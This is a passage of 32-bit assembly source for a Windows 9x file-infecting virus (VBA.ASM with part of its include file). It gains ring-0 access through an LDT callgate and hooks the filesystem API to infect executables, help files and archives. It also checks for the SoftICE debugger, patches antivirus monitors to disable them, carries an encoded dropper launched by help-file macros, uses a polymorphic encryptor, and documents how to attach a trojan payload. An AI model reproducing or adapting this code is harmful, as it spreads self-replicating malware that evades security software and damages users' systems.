;+1 ORIGINAL RETURN ADDRESS XOR EAX,EAX RET ENDP ;------------------------------------------------ TEST_VXD: MOV EAX,[EBP+4+8*4] ;RETURN ADDRESS MOV EDI,EDX TEST_VXD_HOOK: LEA ESI,VXD_NAME[EDI] ;EAX = CHECKING ADDRESS PUSH ESI EAX PUSH _GETVXDNAME CALL VXD_CALL POP EDX ECX VXDCMP_ONLY: CMP 4 PTR [ESI],'59KG' ;GK95? JE IS_AVXD CMP 4 PTR [ESI],'DIPS' ;SPIDER? IS_AVXD: RETN ;------------------------------------------------ IO_CALLBACK PROC ;ENTRY: ECX - IN(OUT)PUT TYPE (IGNORE OTHER DATA STRUC) ;EXIT: EAX - PORT DATA GOFF OFF_IO_CALLBACK BREAK AND ECX,ECX ;BYTE_INPUT? JNE IS_NO_ME MOV AL,WE_HERE ;WE'RE HERE! IS_NO_ME: RET ENDP ;------------------------------------------------ GET_RANDOM_MSK: MOV AL,'Z'-'A'-14 ;------------------------------------------------ GET_RANDOM_BYTE: MOVZX EAX,AL ;------------------------------------------------ ;ENTRY: EAX=(LIMIT-1) OR EAX=0 IF INFINITY,EDX=CODE DELTA IN MEMORY ;EXIT: EAX=RANDOM VALUE, ZF=1 IF ZERO GET_RANDOM PROC PUSH EDX EAX EDX MOV EAX,12345678H GOFF RANDOMIZE,4 MOV EDX,3A7FDH MUL EDX POP EDX ADD EAX,269EC3H MOV 4 PTR RANDOMIZE[EDX],EAX POP EDX AND EDX,EDX JE NO_LIMIT MUL EDX XCHG EAX,EDX NO_LIMIT: AND EAX,EAX POP EDX RET ENDP ;------------------------------------------------ FIND_FREE_SEL PROC CMP EBX,[EDI] ;EBX=0,EDI=LDT CUR POS JNE NO_FREE_SEL CMP EBX,[EDI+4] JE FREE_SEL NO_FREE_SEL: SCASD SCASD CMP EDI,ECX JB FIND_FREE_SEL STC RET FREE_SEL: MOV EAX,EDI SUB EAX,ESI ;ESI=LDT LINEAR ADDRESS OR AL,111B ;LDT/RPL=3 RET ENDP ;------------------------------------------------ GOFF PE_OFF_R0_INSTALL RING0_INSTALL PROC FAR BREAK CLI LEA ESI,OLD_PECODE[EDX] MOV CL,LEN_LOADER REP MOVSB CMP AL,WE_HERE JNE MAKE_INSTALL STI RET ;------------------------------------------------ GOFF OFF_R0_INSTALL MAKE_INSTALL: BREAK CLI PUSH ES DS SS SS POP DS ES ENTERD STACK_FRAME,0 CALL CALC_DELTA MOV ESI,EDX LEA EDI,[ESI+CLI_VXD_CALL] MOV EAX,WINICE_ID MOV EBX,GET_DDB ;18146H PUSH EBX CALL EDI AND ECX,ECX IFNDEF DEBUG JS GO_ERROR ;TEST IF WINICE INSTALLED ENDIF MOV BL,_PAGERESERVE AND 0FFH ;1811DH PUSH PR_FIXED LARGE TOTAL_PAGE_NUM PR_SYSTEM EBX CALL EDI ;RESERVE MEMORY PAGES INC EBX ;_PAGECOMMIT=1811EH AND AL,AL GO_ERROR: JS ERROR XCHG EAX,EBX XCHG EDI,EBX CDQ PUSH PC_WRITEABLE OR PC_FIXED EDX PD_FIXEDZERO LARGE TOTAL_PAGE_NUM SHLD EDX,EDI,20 PUSH EDX EAX CALL EBX ;COMMIT RESERVED MEMORY PAGES CMP EAX,1 JB GO_FREE_PAGE PUSH EDI MOV ECX,OUR_LEN REP MOVSB POP EDI LEA ESI,[EDI+OFF_IO_CALLBACK] MOV EDX,OUR_PORT PUSH INSTALL_IO_HANDLER CALL EBX ;HOOK PORT GO_FREE_PAGE: JB FREE_PAGE MOV EDX,EDI CALL SET_TIME ;INIT FIRST INF_TIME PUSH GET_DATE_AND_TIME CALL EBX ADD RANDOMIZE[EDI],EAX ;INIT RANDOMIZE PUSH GET_CONFIG_DIRECTORY CALL EBX ;STORE &%WINDIR% MOV SYS_PATH[EDI],EDX LEA EAX,OFF_IFS_HOOKER[EDI] PUSH EAX INSTALLAPIHOOK CALL EBX ;HOOK FILESYSTEMAPI MOV OLD_IFS_HOOKER[EDI],EAX MOV ECX,[EBP-4] LEA EDX,OFF_IAPI_HOOKER[EDI] XCHG EDX,[ECX] ;HOOK INSTALLFILESYSTEMAPIHOOK MOV OLD_IAPI_HOOKER[EDI],EDX SCAN_CHAIN: PUSH EAX MOV EAX,[EAX] CALL TEST_VXD_HOOK POP EDX XCHG EAX,ECX JECXZ NO_VXD_MEM MOV EAX,[EDX+4] LEA EAX,[EAX+4] JNE NO_AV_HOOKER MOV ECX,[EDX] MOV 2 PTR [ECX],1234H ;DISABLE AV FILE MONITORING ORG $-2 JMP 4 PTR DS:[12345678H] ORG $-4 MOV [ECX+2],EAX NO_AV_HOOKER: CMP 4 PTR [ESI],'MSFI' ;IFSMGR? JNE SCAN_CHAIN NO_VXD_MEM: LEA ESI,OFF_RAPI_HOOKER[EDI] MOV EAX,REMOVEAPIHOOK AND 0FFFF7FFFH PUSH HOOK_DEVICE_SERVICE CALL EBX ;HOOK REMOVEFILESYSTEMAPIHOOK MOV OLD_RAPI_HOOKER[EDI],ESI JMP ERROR FREE_PAGE: PUSH 0 EDI _PAGEFREE CALL EBX ERROR: LEAVED POP DS ES STI RET ENDP ;------------------------------------------------ ;INIT DATA AREA GOFF CHK_NT RELO_CHK_NT DB "IF(NOT(FE(`C:\\" IFNDEF DEBUG DB "NTLDR" ELSE DB "NTLD_" ENDIF DB ".')),`" LEN_CHK_NT = $-RELO_CHK_NT GOFF RR_MACRO DB 'RR("KERNEL32","Sleep","U")',"')",0 GOFF DROP_MACRO DB "EF(`COMMAND.COM',",'"/CECHO ',0 GOFF SLEEP_MACRO DB "Sleep(550)')",0 GOFF EXEC_MACRO_1 DB "EF(`",0 EXEC_2 DB "',qchPath,0)')" LEN_EXEC_2 = $-EXEC_2 ;DOSDROP.COM START GOFF RUN_DROPPER RUN_DROPPER_LB DB 58H,2CH,53H,50H,5EH,6AH,21H,5BH,68H,51H,40H,58H,28H,40H,6CH,28H,40H,6DH DB 30H,40H,6EH,28H,40H,70H,28H,40H,73H,28H,40H,76H,28H,40H,76H,28H,40H,7DH DB 50H,5FH,2CH,31H,6CH,6AH,44H,58H,34H,40H,50H,59H,68H UU_MASK = $-RUN_DROPPER_LB DW 'AA' DB 58H,56H,5FH,29H,40H,7EH,72H,5EH,23H,31H,7FH,24H,40H,7EH,50H,70H,7EH,31H DB 41H,7EH,47H,46H,46H,79H,3BH LEN_UUD = $-RUN_DROPPER_LB GOFF RDROP_CON RDROP_CON_LB DB 0BEH,80H,0,0ACH,98H,93H,88H,38H,0ACH,3CH,20H,74H,0FBH,4EH,0BBH,24H,20H DB 0BAH,1,0,0E8H,6FH,0,0B1H,10H,0E8H,63H,0,8BH,54H,26H,8BH,4CH,28H,0B8H,0 DB 42H,50H,0CDH,21H,59H,0E8H,53H,0,50H,91H,8BH,0FAH,0B8H GOFF FIRST_DROP_MASK OFF_MASK1 DW 1234H DB 31H,5,5 GOFF SECOND_DROP_MASK RELO_MASK2 = $-OFF_MASK1 DW 1234H DB 47H,0E2H,0F8H,0B4H,3EH,0CDH,21H,0BBH,11H,60H,0BAH,12H,0,0E8H,3EH,0,59H DB 0B4H,40H,0E8H,33H,0,0B4H,3EH,0CDH,21H,0BCH,9,4,0B3H,41H,0B4H,4AH,0CDH DB 21H,0BBH,0EBH,1,8CH,4FH,4,8CH,4FH,8,8CH,4FH,0CH,0B8H,0,4BH,56H,0E8H,0CH DB 0,0EH,17H,0BCH,7,4,0EH,1FH,5EH,6AH,0,0B4H,41H,8BH,0D6H,0CDH,21H,0C3H DB 0B4H,3FH,0BAH,0F9H,1,0EBH,0F6H,0F9H,0B8H,6CH,71H,0CDH,21H,0BEH,0DFH,1 DB 72H,0E5H,93H,0C3H DB 'C:\' GOFF RDROP_NAME DB 'ABCDE.COM' DB 0,0,80H,0,0,0,5CH,0,0,0,6CH,0 LEN_RDROP_CON = $-RDROP_CON_LB ;DOSDROP.COM END GOFF INF_PROCS DW INF_EXE DW INF_HLP DW INF_RAR DW INF_ZIP DW INF_ARJ DW INF_HA GOFF COMMAND_PIF C_PIF_RELO DB 'command.pif' LEN_COMMAND_PIF = $-C_PIF_RELO GOFF WININIT_INI W_INI_RELO DB 'wininit.ini' LEN_WININIT_INI = $-W_INI_RELO GOFF SYSTEM_INI S_INI_RELO DB 'system.ini' LEN_SYSTEM_INI = $-S_INI_RELO ;------------------------------------------------ ;ENTRY POINT HERE FOR PE-FILES GOFF PE_INSTALL_POP SUB 4 PTR [ESP],1234H ;FOR CALL GOFF ENCRYPTOR_LEN,4 POP 4 PTR [ESP+INTRUD_OFF] GOFF PE_INSTALL GATE_ADDR = 6 PTR [EBP-6] ENTERD 6,0 ;FOR JMP PUSHFD PUSHAD CLD CALL SET_SEH PROCESS_SEH: POP ECX ECX ESP ;ESTABLISHERFRAME (+8) EXIT: XOR ECX,ECX POP 4 PTR FS:[ECX] ;REMOVE OUR EXCEPTION HANDLER POP EBX CMP CL,[EBX+RW_LOCAL_RELO] JE NO_REST_HOST MOV CL,LEN_LOADER MOV EDI,[EBX+IOFF_LOCAL_RELO] LEA ESI,[EBX+ECX+OLDP_LOCAL_RELO-LEN_LOADER] REP MOVSB NO_REST_HOST: POPAD POPFD LEAVED GOFF RESTORE_REGS DB LEN_FILL_RESTORE DUP (90H) ;(MOV DREG,[ESP+XXXXXXXX])[4] PUSH 12345678H GOFF INTRUD_OFF,4 IOFF_LOCAL_RELO = $-PROCESS_SEH-4 RET 1234H GOFF COUNT_RET,2 SET_SEH: XOR EBX,EBX PUSH 4 PTR FS:[EBX] MOV FS:[EBX],ESP ;SET OUR EXCEPTION HANDLER SLDT CX JECXZ EXIT ;NO LDT? (WIN NT) MOV DX,OUR_PORT IN AL,DX CMP AL,WE_HERE ;WE'RE ALREADY IN MEMORY? JE $+2 ;EXIT GOFF RW_OR_RO,1 RW_LOCAL_RELO = $-PROCESS_SEH-1 RW_LOCAL_EXIT = $-EXIT-1 PUSH EAX SGDT 6 PTR [ESP-2] ;FIND LDT LINEAR ADDRESS POP ESI PUSH EAX MOV EDI,[ESI.ECX.1] MOV AL,[ESI.ECX.SEL_BASE_HIGH] MOV CX,[ESI.ECX.SEL_LIMIT_LOW] SHRD EDI,EAX,8 ;GET LINEAR ADDRESS OF LDT MOV ESI,EDI ADD ECX,EDI ;GET LIMIT OF LDT CALL FIND_FREE_SEL ;FIND NON-USED DESCRIPTOR GO_EXIT: JB EXIT PUSH EDI EAX ;FOR R0 CS CALL NO_FREE_SEL POP EBX ESI ECX GO1_EXIT: JB GO_EXIT MOV 2 PTR SS:GATE_ADDR+4,AX ;AND FOR CALLGATE SELECTOR CALL CALC_DELTA LEA EAX,PE_OFF_R0_INSTALL[EDX] PUSH EDI STOSW ;MAKE CALLGATE DESCRIPTOR SHR EAX,16 MOV [EDI+4],AX XCHG EAX,EBX STOSD MOV 1 PTR [EDI-1],11101100B ;P=1:DPL=3:S=0:TYPE=0CH (CALLGATE) MOV EDI,ESI ;MAKE R0 CS DESCRIPTOR PUSH EDI MOV AX,-1 ;LIMIT=0FFFFH STOSD MOV EAX,1100111110011010B SHL 8 ;G=1:32BIT:AVL=0:LIMIT=0FH STOSD ;P=1:DPL=0:S=1:CODE:NONCONF:READ=1:NOACCESS XCHG EAX,ECX MOV EDI,INTRUD_OFF[EDX] XOR ECX,ECX MOV CL,LEN_LOADER PUSH EDI _SCASB: SCASB ;LOAD CODE PAGE(S) INTO MEMORY LOOP _SCASB POP EDI CALL GATE_ADDR POP EDI XOR EAX,EAX STOSD STOSD POP EDI STOSD STOSD STC JMP GO1_EXIT GOFF OUR_LEN INIT_PAGE_NUM = (OUR_LEN+0FFFH)/1000H ;------------------------------------------------ ;ZERO INITIALIZED DATA GOFF ZERO_INIT GOFF OLD_PECODE OLDP_LOCAL_RELO = $-PROCESS_SEH DB LEN_LOADER DUP (?) GOFF SHELL_FLAG SHELL_FLAG_RELO DB ? GOFF SYS_PATH SYS_PATH_RELO DD ? GOFF FLAG DD ? ;BIT 0 - REENTERING FLAG SYS_PATH_DELTA = $-SYS_PATH_RELO SHELL_FLAG_DELTA = $-SHELL_FLAG_RELO GOFF TMP_PATH DB MAX_PATH DUP (?) AREA_COMMON_1: GOFF SYS_FILE_HEADER FILE_HEADER <> SYSTEM_HEADER <> GOFF BUFF4MACRO DB (LEN_UUD+2*LEN_RDROP_CON) DUP (?) ORG AREA_COMMON_1 GOFF IO_BUFFER DB LEN_IOBUFF DUP (?) ORG AREA_COMMON_1 GOFF OUR_ARJ_FHEADER ARJ_HDR_STRUC <> DB MAX_PATH DUP (?) DB 8 DUP (?) ORG AREA_COMMON_1 GOFF OUR_HA_FHEADER HA_FILE_HEADER <> DB MAX_DOS_PATH DUP (?) ORG AREA_COMMON_1 GOFF OUR_RAR_FHEADER RAR_FILE_HDR <> DB MAX_PATH DUP (?) ORG AREA_COMMON_1 OUR_LOCAL_HEADER_RELO: GOFF OUR_LOCAL_HEADER ZIP_LOCAL_HEADER <> DB MAX_PATH DUP (?) GOFF OUR_CENTRAL_HEADER ZIP_CENTRAL_HEADER <> DB MAX_PATH DUP (?) GOFF ZIP_CUR_OFF DD ? GOFF ZIP_CENTRAL_OFF DD ? GOFF ZIP_FILE_COUNTER DD ? GOFF ZIP_EXEC_FLAG DB ? SIZE_ARC_AREA = $-OUR_LOCAL_HEADER_RELO GOFF INSERT_BUFF DB LEN_IOBUFF DUP (?) AREA_COMMON_2: GOFF FIND_DATA _WIN32_FIND_DATA <> ORG AREA_COMMON_2 GOFF HLP_HEADER HLP_START <> GOFF HLP_DIRECTORY DB LEN_HLP_DIR DUP (?) ORG AREA_COMMON_2 GOFF BUFF_ZIP_HEADER ZIP_CENTRAL_HEADER <> DB MAX_PATH DUP (?) ORG AREA_COMMON_2 GOFF HEADER DOS_HEADER <> GOFF PHEADER PE_HEADER <> GOFF OTABLE OBJECT_TABLE MAX_OBJS DUP (<>) AREA_COMMON_3: GOFF PUSHED_REGS DW ? DB 4 DUP (?) GOFF SHIT_FLAG DB ? GOFF DIRTY_SREG DB ? GOFF DIRTY_WREG DB ? ;XXX1XXXX (1-USED,0-UNUSED) ; ^AX ; ^CX ; ^DX ; ^BX ; ^BP ; ^SI ;^DI GOFF WREG_LIST DB 8 DUP (?) ;VALID REGISTER LIST SPE_COMMON: GOFF ADDRESS_MODE DW ? ;IF (HIBYTE)=0FFH THEN SHORT GOFF OFF_VALUE DD ? ;OFFSET VALUE GOFF DELTA_VALUE DD ? ;DELTA VALUE IN [OFF_REG+DELTA] GOFF MASK_VALUE DD ? ;MASK VALUE GOFF TOP_ADDRESS DD ? ;ADDRESS OF TOP DWORD GOFF DEC_OFF_COUNT DB ? ;DECREMENT OFF_REG COUNTER GOFF OFF_REG DB ? ;OFFSET REGISTER GOFF COUNT_REG DB ? ;COUNTER REGISTER GOFF MASK_REG DB ? ;MASK REGISTER GOFF WORK_REG DB ? ;WORK REGISTER GOFF STORE_WR_FLAG DB ? ;STORING WORK_REG FLAG GOFF CHG_WR_FLAG DB ? ;CHANGING WORK_REG FLAG GOFF SET_WR_FLAG DB ? ;SETTING WORK_REG FLAG GOFF DEC_ESP_COUNT DB ? ;DECREMENT ESP COUNTER GOFF WORD_MODE DB ? ;WORD (1) OR DWORD (0) MODE GOFF SPE32_BUFF ORG SPE_COMMON GOFF ADDRESS_EMPTY DW ? GOFF ADDRESS_BUFF DW LEN_DECRYPTOR DUP (?) ;BUFFER FOR ADDRESSES GOFF LEN_SEEK DW ? GOFF SEEK_TABLE DB LEN_DECRYPTOR+1 DUP (?) ;FOR CHOOSE DECRYPTOR BYTES GOFF TEMP_DECRYPTOR DB LEN_DECRYPTOR DUP (?) ;TEMPORARY DECRYPTOR BUFFER GOFF ENCRYPT_BUFF DB LEN_MAIN_BUFF DUP (?) ;WORK BUFFER GOFF SET_ALIGN SET_ALIGN_NEW = (((SET_ALIGN+3) AND (NOT 3))-END_CODE16) ORG SET_ALIGN_NEW ;ALIGN 4 (GLOBAL) GOFF MAIN_BUFF IMM_MBUFF: DB ((OUR_LEN+100H+1+LEN_LOADER+3)/4)*4 DUP (?) ;100H-MAX LENGTH OF END SHIT SIZE_MBUFF = $-IMM_MBUFF GOFF VXD_NAME DB MIN_VXDNAME_SIZE DUP (?) GOFF TOTAL_LEN TOTAL_PAGE_NUM = (TOTAL_LEN+0FFFH)/1000H ENDS END START ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[VBA.ASM]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[VBA.INC]ÄÄÄ COMMENT / (C) VBA Ltd. ALL RIGHTS RESERVED. E-mail: support@vba.com.by THIS PROGRAM IS FREE FOR COMMERCIAL AND NON-COMMERCIAL USE. REDISTRIBUTION AND USE IN SOURCE AND BINARY FORMS, WITH OR WITHOUT MODIFICATION, ARE PERMITTED. THIS SOFTWARE IS PROVIDED BY VBA LTD. ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. / ;DEBUG = 1 ;COMMENTED IF RELEASE \ ;UNCOMMENTED IF DEBUG HAPPY_YEAR = 1999 HAPPY_MONTH = 7 HAPPY_POSSIBLITY = 6 MSG_POSSIBLITY = 48 NOCHNG_SATT_PSBL = 4 CHNG_SNAME_PSBL = 8 WAIT_TIME = 3 ;SEC SLEEP_TIME = 1 ;MIN MAX_OBJS = 20 MIN_ARC_FILES = 10 WE_HERE = '!' OUR_PORT = 'SK' STACK_FRAME = 6 TROJAN_NAME_SIZE = 4+1+3 ;XXXX.XXX (FOR EXAMPLE,TEST.TST) TROJAN_STAMP = 0FFH ;DATE STAMP: 07/31/1980 (0FFH) AND ;LOBYTE(TIME)=0, FOR EXAMPLE,00:00:00 ;ALSO RAR ARCHIVE MUST HAVE A DATE <= 2 WEEK AGE AT CURRENT DATE. ;NOTE: TROJAN MUST BE APPENED TO A RAR ARCHIVE BY "STORED" METHOD. TROJAN MUST ;PRESERVE DS,ES,SS,ESP,EBP,EBX,EDX REGISTERS AND HAVE IMAGE OF 32BIT SUBROUTINE ;(LAST COMMAND - RETN). ALSO TROJAN MUST HAVE LENGTH <= 2000H BYTES. ;ON TROJAN ENTRY: ;EDX=BEGIN VIRII MEMORY REGION,ESI=BEGIN OF TROJAN,EBP=STACK FRAME FOR VIRII ;INTERNAL VXD CALLS (SEE VXD_CALL SUBROUTINE IN VIRII CODE,YOU MAY ALSO INCLUDE ;THIS SUBROUTINE TO TROJAN FOR EFFECTIVE CALLING VXD SERVICES),DS,ES,SS,CS= ;RING0 FLAT. LEN_LOADER = ((168+3)/4)*4 LEN_IOBUFF = 400H LEN_HLP_DIR = 100H+SIZE DOS_HEADER LEN_MAIN_BUFF = 0A00H LEN_PEND_JUNK = 80H LEN_FILL_CRYPT = 12 LEN_FILL_RESTORE= 4*7 MIN_VXDNAME_SIZE= 80 HLP_LEN_LINE = 102 MIN_RELOC_SIZE = 0A00H GET_CUR_VM_HANDLE = 18001H ;VMM GET_SYSTEM_TIME = 1803FH _PAGEFREE = 18055H ALLOCATE_GDT_SELECTOR = 18076H FREE_GDT_SELECTOR = 18077H HOOK_DEVICE_SERVICE = 18090H INSTALL_IO_HANDLER = 18096H GET_CONFIG_DIRECTORY = 180B7H FATAL_ERROR_HANDLER = 180BEH _PAGERESERVE = 1811DH _PAGECOMMIT = 1811EH _ENTERMUSTCOMPLETE = 18135H _LEAVEMUSTCOMPLETE = 18136H GET_DDB = 18146H _GETVXDNAME = 1817EH GET_DATE_AND_TIME = 58008H ;VTD SHELL_MESSAGE = 178004H ;SHELL GET_DOSTIME = 408007H ;IFSMGR RING0_FILEIO = 408032H UNITOBCSPATH = 408041H INSTALLAPIHOOK = 408067H REMOVEAPIHOOK = 408068H WINICE_ID = 202H BCHECKER_ID = 205H IMMUNER_ID = 534BH SIWVID_ID = 7A5FH EF_HANG_ON_EXIT = 1 BYTE_INPUT = 0 BLOCK_SVC_INTS = 1 BLOCK_THREAD_IDLE = 10H PR_FIXED = 8 PR_SYSTEM = 80080000H PC_WRITEABLE = 20000H PC_FIXED = 8 PD_FIXEDZERO = 3 MAX_PATH = 260 MAX_DOS_PATH = 128 IFSFN_WRITE = 1 IFSFN_CLOSE = 11 IFSFN_FILEATTRIB = 33 IFSFN_OPEN = 36 IFSFN_RENAME = 37 IFSFH_RES_UNC = 1 IFSFH_RES_NETWORK = 8 IFSFH_RES_LOCAL = 10H IFSFH_RES_CFSD = 80H ACCESS_READONLY = 0 ACCESS_WRITEONLY = 1 ACCESS_READWRITE = 2 ACTION_CREATENEW = 10H ACTION_REPLACEEXISTING = 2 ACTION_CREATEALWAYS = 12H ACTION_OPENALWAYS = 11H ACTION_OPENEXISTING = 1 R0_NO_CACHE = 100H OPEN_FLAGS_REOPEN = 800H R0_SWAPPER_CALL = 1000H OPEN_FLAGS_COMMIT = 4000H FILE_FLAG_WILDCARDS = 80000000H FA_READONLY = 1 FA_SYSTEM = 4 FA_LABEL = 8 FA_DIRECTORY = 10H FA_DEVICE = 40H FGET_ATTRIBUTES = 0 ; GET ATTRIBUTES OF FILE/DIR FSET_ATTRIBUTES = 1 ; SET ATTRIBUTES OF FILE/DIR SET_ATTRIB_MODIFY_DATETIME = 3 SET_ATTRIB_LAST_ACCESS_DATETIME = 5 SET_ATTRIB_CREATION_DATETIME = 7 OPEN_ACCESS_READONLY = 0 OPEN_ACCESS_WRITEONLY = 1 OPEN_ACCESS_READWRITE = 2 OPEN_ACCESS_RO_NOMODLASTACCESS = 4 OPEN_SHARE_DENYREADWRITE = 10H OPEN_SHARE_DENYWRITE = 20H OPEN_FLAGS_NOCRITERR = 2000H FILE_OPEN = 1 FILE_CREATE = 10H FILE_TRUNCATE = 2 R0_OPENCREATFILE = 0D500H ; OPEN/CREATE A FILE R0_READFILE = 0D600H ; READ A FILE, NO CONTEXT R0_WRITEFILE = 0D601H ; WRITE TO A FILE, NO CONTEXT R0_CLOSEFILE = 0D700H ; CLOSE A FILE R0_GETFILESIZE = 0D800H ; GET SIZE OF A FILE R0_FINDFIRSTFILE = 4E00H ; DO A LFN FINDFIRST OPERATION R0_FINDNEXTFILE = 4F00H ; DO A LFN FINDNEXT OPERATION R0_FINDCLOSEFILE = 0DC00H ; DO A LFN FINDCLOSE OPERATION R0_FILEATTRIBUTES = 4300H ; GET/SET ATTRIBUTES OF A FILE R0_DELETEFILE = 4100H ; DELETE A FILE R0_GETDISKFREESPACE = 3600H ; GET DISK FREE SPACE IOREQ STRUC IR_LENGTH DD ? ;0 LENGTH OF USER BUFFER IR_FLAGS DB ? ;4 MISC. STATUS FLAGS IR_USER DB ? ;5 USER ID FOR THIS REQUEST IR_SFN DW ? ;6 SYSTEM FILE NUMBER OF FILE HANDLE IR_PID DD ? ;8 PROCESS ID OF REQUESTING TASK IR_PPATH DD ? ;C UNICODE PATHNAME IR_AUX1 DD ? ;10 SECONDARY USER DATA BUFFER (CURDTA) IR_DATA DD ? ;14 PTR TO USER DATA BUFFER IR_OPTIONS DW ? ;18 REQUEST HANDLING OPTIONS IR_ERROR DW ? ;1A ERROR CODE (0 IF OK) IR_RH DD ? ;1C RESOURCE HANDLE IR_FH DD ? ;20 FILE (OR FIND) HANDLE IR_POS DD ? ;24 FILE POSITION FOR REQUEST IR_AUX2 DD ? ;28 MISC. EXTRA API PARAMETERS IR_UPATH DD ? ;2C MISC. EXTRA API PARAMETERS IR_PEV DD ? ;30 PTR TO IFSMGR EVENT FOR ASYNC REQUESTS IR_FSD DB 64 DUP (?) ;34 PROVIDER WORK SPACE ENDS IR_SIZE EQU IR_POS IR_ATTR2 EQU IR_POS ; DESTINATION ATTRIBUTES FOR RENAME IR_ATTR EQU IR_LENGTH ; DOS FILE ATTRIBUTE INFO IR_DATETIME EQU IR_AUX2 ; OVERLAYED ON RETURN FROM FSD PATH_ELEMENT STRUC PE_LENGTH DW ? PE_UNICHARS DW ? ENDS PARSED_PATH STRUC PP_TOTALLENGTH DW ? PP_PREFIXLENGTH DW ? PP_ELEMENTS DB 4 DUP (?) ENDS BCS_WANSI = 0 ; USE WINDOWS ANSI SET _FILETIME STRUC DWLOWDATETIME DD ? DWHIGHDATETIME DD ? ENDS DOS_TIME STRUC DT_TIME DW ? DT_DATE DW ? ENDS _WIN32_FIND_DATA STRUC DWFILEATTRIBUTES DD ? FTCREATIONTIME DB (SIZE _FILETIME) DUP (?) FTLASTACCESSTIME DB (SIZE _FILETIME) DUP (?) FTLASTWRITETIME DB (SIZE _FILETIME) DUP (?) NFILESIZEHIGH DD ? NFILESIZELOW DD ? DWRESERVED0 DD ? DWRESERVED1 DD ? CFILENAME DW MAX_PATH DUP (?) ; INCLUDES NULL CALTERNATEFILENAME DW 14 DUP (?) ; INCLUDES NULL ENDS _TYPE RECORD RES:1,DPL:2,SYSORNOT:1,STYPE:4 SEL STRUC SEL_LIMIT_LOW DW ? SEL_BASE_LOW DW ? SEL_BASE_LOWH DB ? SEL_TYPE _TYPE <> SEL_LIMIT_HIGH DB ? SEL_BASE_HIGH DB ? ENDS GOFF MACRO LBL,DELTA IFNB LBL EQU $-START_CODE32+END_CODE16-DELTA ELSE LBL EQU $-START_CODE32+END_CODE16 ENDIF ENDM BREAK MACRO IFDEF DEBUG INT 3 ENDIF ENDM ;PE FILES SECTION PE_FLAG_NOT_FIXUP = 1 PE_FLAG_EXECUTABLE = 2 PE_FLAG_32BIT = 100H PE_FLAG_DLL = 2000H OT_FLAG_CODE = 20H OT_FLAG_IDATA = 40H OT_FLAG_UDATA = 80H OT_FLAG_DISCARDABLE = 02000000H OT_FLAG_NOTCACHED = 04000000H OT_FLAG_NONPAGED = 08000000H OT_FLAG_SHARED = 10000000H OT_FLAG_EXECUTE = 20000000H OT_FLAG_READ = 40000000H OT_FLAG_WRITE = 80000000H DOS_HEADER STRUC DOSH_SIGNATURE DW ? ; 'MZ' DOSH_CBLP DW ? DOSH_CP DW ? DOSH_CRLC DW ? DOSH_CPARHDR DW ? DOSH_MINALLOC DW ? DOSH_MAXALLOC DW ? DOSH_SS DW ? DOSH_SP DW ? DOSH_CSUM DW ? DOSH_IP DW ? DOSH_CS DW ? DOSH_LFARLC DW ? ; RELOCATION TABLE ADDRESS DOSH_OVNO DW ? DOSH_RES DW 4 DUP (?) DOSH_OEMID DW ? DOSH_OEMINFO DW ? DOSH_RES2 DW 10 DUP (?) DOSH_LFANEW DW ? ; NEW EXE HEADER ADDRESS ENDS SD STRUC SD_RVA DD ? SD_SIZE DD ? ENDS PE_HEADER STRUC PEH_SIGNATURE DD ? ;PE,0,0 PEH_CPUTYPE DW ? ;<=162H PEH_NUMOFOBJECT DW ? PEH_TIMEDATE DD ? PEH_COFFPOINTER DD ? PEH_COFFSIZE DD ? PEH_NTHSIZE DW ? PEH_FLAGS DW ? PEH_MAGIC DW ? PEH_LINKMAJOR DB ? PEH_LINKMINOR DB ? PEH_CODESIZE DD ? PEH_IDATASIZE DD ? PEH_UDATASIZE DD ? PEH_ENTRYPOINT DD ? PEH_CODEBASE DD ? PEH_DATABASE DD ? PEH_IMAGEBASE DD ? PEH_OBJALIGN DD ? PEH_FILEALIGN DD ? PEH_OSMAJOR DW ? PEH_OSMINOR DW ? PEH_USERMAJOR DW ? PEH_USERMINOR DW ? PEH_SUBMAJOR DW ? PEH_SUBMINOR DW ? PEH_RESERVED1 DD ? PEH_IMAGESIZE DD ? PEH_HEADERSIZE DD ? PEH_FILECRC DD ? PEH_SUBSYSTEM DW ? PEH_DLLFLAGS DW ? PEH_STACKRES DD ? PEH_STACKCOM DD ? PEH_HEAPRES DD ? PEH_HEAPCOM DD ? PEH_LOADFLAGS DD ? PEH_NUMRVA DD ? ;10H PEH_EXPORT SD ? PEH_IMPORT SD ? PEH_RESOURCE SD ? PEH_EXEPTION SD ? PEH_SECURITY SD ? PEH_FIXUP SD ? PEH_DEBUG SD ? PEH_DESCRIPT SD ? PEH_MACHINE SD ? PEH_TLSRVA SD ? PEH_LCONFIG SD ? PEH_RESERVED2 SD ? PEH_IATRVA SD ? PEH_BOUNDIMPORT SD ? PEH_RESERVED3 SD ? PEH_RESERVED4 SD ? ENDS OBJECT_TABLE STRUC OT_NAME DB 8 DUP (?) OT_VIRTSIZE DD ? OT_RVA DD ? OT_PHYSICALSIZE DD ? OT_PHYSICALOFF DD ? OT_RESERVED DB 0CH DUP (?) OT_FLAGS DD ? ENDS ;WINDOWS HELP FILE (HLP) HLP_MAGIC = 35F3FH HLP_SH_MAGIC = 36CH ID_CONFIG = 